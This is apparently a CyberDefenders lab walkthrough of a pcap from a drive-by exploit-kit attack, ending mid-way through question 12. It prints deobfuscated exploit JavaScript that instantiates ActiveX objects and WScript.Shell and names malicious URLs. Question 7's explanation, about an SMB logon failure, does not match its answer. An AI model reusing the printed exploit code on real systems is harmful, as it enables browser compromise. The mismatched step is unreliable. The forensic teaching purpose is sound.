A network trace with attack data is provided. Please note that the IP address of the victim has been changed to hide the true location.

Information

Category Name: NukeTheBrowser

Files:
c28-NukeTheBrowser.zip 105 KB
– NukeTheBrowser.pcap 306KB

My Recommendations

Verify Wireshark is installed

It’s all we need to solve the challenge.

wireshark -v

Download and Verify the archive

Download it from CyberDefenders and verify it with:

sha1sum /path/to/c28-NukeTheBrowser.zip

SHA1SUM: f090b4726818459cbae29613f0d2ade999e18146

Walkthrough

1. Multiple systems were targeted. Provide the IP address of the highest one.

In Wireshark, we can use Statistics –> Conversations , which will ‘summarize’ conversations by protocol. If we select IPv4, and then sort Address A by descending order, we will see that the highest IP address is 10.0.5.15:

Answer: 10.0.5.15

2. What protocol do you think the attack was carried over?

Usually, when dealing with pcap files, I like to peek into the Export Objects -> HTTP and see what files were downloaded to the system.

There are four suspicious files. Their content type is ‘Application/octet-stream’, which is the type assigned to executables. Moreover, they were downloaded from the hostname sploitme.com.cn which is equally suspicious:

We can then save one of the files and check it in Virus Total. In this case it is flagged as malicious.

Answer: HTTP

3. What was the URL for the page used to serve malicious executables?

(don’t include URL parameters)

If we check the frames individually for the filenames above, they are all executables, downloaded from the same ‘parent’ url.

Without the parameters, the (disarmed) URL is http[://]sploitme[.]com[.]cn/fg/load[.]php

Answer: http[://]sploitme[.]com[.]cn/fg/load[.]php

4. What is the number of the packet that includes a redirect to the french version of Google and probably is an indicator for Geo-based targeting?

We can search for packets querying the french version of Google by using the dns.query.name filter:

After removing the filter, the packet right above shows a page redirecting to the french version of Google:

Answer: 299

5. What was the CMS used to generate the page 'shop.honeynet.sg/catalog/'?

(Three words, space in between)

First, we can filter for the request uri using the following query: http.request.uri == “/catalog/” . It returns only one frame, 408. Next, we can click on that frame and select Analyze->Follow->HTTP Stream. Scrolling through, a special message reveals the CMS:

Answer: osCommerce Online Merchant

6. What is the number of the packet that indicates that 'show.php' will not try to infect the same host twice?

We can filter the packets for the specific uri path of show.php to see the requests issued:
http.request.uri.path == “/fg/show.php”:

There are four packets matching this uri path. The first three packets have the same parameter, as opposed to the last one. Interestingly, the second and third packet are requested by the same host. We can check the response to packets 157 and 358 and compare them.

Packet 174 contains the response to packet 157 (the first request from host 10.0.3.15):

The HTML page says that the URL is not found on the server, but it contains obfuscated JavaScript intended to infect the host.

The response to packet 358, which is packet 366, doesn’t contain any JavaScript:

Therefore packet 366 proves that show.php won’t infect the same host twice.

Answer: 366

7. One of the exploits being served targets a vulnerability in "msdds.dll". Provide the corresponding CVE number.

Removing the filters from smb.pcapng, and using the find (Packet details, Narrow & Wide, Strings) option of Wireshark (noob life) for SAMBA. There is a STATUS_LOGON_FAILURE at Frame 76. To find its hex status code we must go to NT STATUS of this frame, which is (0x000006d).

Answer: CVE-2005-2127

8. What is the name of the executable being served via 'http://sploitme.com.cn/fg/load.php?e=8' ?

Looking for ‘javascript’ in the backet bytes, frame 496 contains a large obfuscated JavaScript code:

We can save it as it is, and then extract the JS code with bash. We can change the eval to console.log directly with sed. Afterwards, we can simply run the code with js and save the deobfuscated output:

				
					tail -n +11 javascript.html | head -n -4 | sed 's/eval(/console.log(/g' > malicious.js
js malicious.js > deobfuscated.js

Here is a sample of the output:

Finally, to make it readable we can use CyberChef with the JavaScript Beautifier option. The script executes function mdac first:

				
					function mdac() {
	var i = 0;
	var objects = new Array('{BD96C556-65A3-11D0-983A-00C04FC29E36}', '{BD96C556-65A3-11D0-983A-00C04FC29E36}', '{AB9BCEDD-EC7E-47E1-9322-D4A210617116}', '{0006F033-0000-0000-C000-000000000046}', '{0006F03A-0000-0000-C000-000000000046}', '{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}', '{6414512B-B978-451D-A0D8-FCFDF33E833C}', '{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}', '{06723E09-F4C2-43c8-8358-09FCD1DB0766}', '{639F725F-1B2D-4831-A9FD-874847682010}', '{BA018599-1DB3-44f9-83B4-461454C84BF8}', '{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}', '{E8CCCDDF-CA28-496b-B050-6C07C962476B}', null);
	while (objects[i]) {
		var a = null;
		if (objects[i].substring(0, 1) == '{') {
			a = document.createElement('object');
			a.setAttribute('classid', 'clsid:' + objects[i].substring(1, objects[i].length - 1));
		} else {
			try {
				a = new ActiveXObject(objects[i]);
			} catch (e) {
			}
		}
		if (a) {
			try {
				var b = CreateO(a, 'WScript.Shell');
				if (b) {
					if (Go(a)) {
						if (CheckIP()) {
							Complete();
						} else {
							aolwinamp();
						}
						return true;
					}
				}
			} catch (e) {
			}
		}
		i++;
	}
	aolwinamp();
}

Then, each function calls a subsequent function in this order:

1. alolwinamp
2. directshow
3. snapshot
4. com
5. spreadsheet

Each function – except snapshot – contains a shellcode, and all of them are executed. We can see them all by using egrep:

				
					egrep 'function|unescape' beautified.js

Then, I individually copy/pasted the shellcode into CyberChef, decoded it and saved it according to its function name. For example, the shellcode in function aolwinamp :

I ran each shellcode with scdbg, with the options ‘Unlimited Steps’ and ‘FindSc’. Function spreadsheet contained the shellcode relevant to e?=8:

The output shows that the executable name is ‘e.exe’.

Answer: e.exe

9. ...Provide the full MD5 hash.

One of the malicious files was first submitted for analysis on VirusTotal at 2010-02-17 11:02:35 and has an MD5 hash ending with ‘78873f791’...

In question 2, the executable uploaded to Virus Total was first submitted on 2010-02-17. Its md5 hash is 52312bb96ce72f230f0350e78873f791.

Answer: 52312bb96ce72f230f0350e78873f791

10. What is the name of the function that hosted the shellcode relevant to 'http://sploitme.com.cn/fg/load.php?e=3'?

Previously, the obfuscated code in frame 496 showed multiple shellcodes being hosted on the site.

Function aolwinamp’s shellcode contained the shellcode relevant to load.php?e=3:

Answer: aolwinamp

11. Deobfuscate the JS at 'shop.honeynet.sg/catalog/' and...

..provide the value of the ‘click’ parameter in the resulted URL.

There is only one frame containing this uri, and it’s frame 415. If we select Analyze -> Follow -> HTTP Stream, and search for JavaScript there is only one occurrence:

Pasting it’s contents into a JavaScript Sandbox, we can simply replace ‘document.write(m)’ with ‘console.log(m)’:

Answer: 84c090bd86

12. Deobfuscate the JS at 'rapidshare.com.eyu32.ru/login.php' and...

…provide the value of the ‘click’ parameter in the resulted URL.

Using the Export Objects –> HTTP, then filtering for rapidshare.com.eyu32.ru, we can select one of the returned frames and inspect its contents:

The JavaScript is passed through eval. We can copy its contents to a JavaScript sandbox. To deobfuscate the text, we just need to change the script by adding console.log after eval, and a closing parenthesis at the end of the code: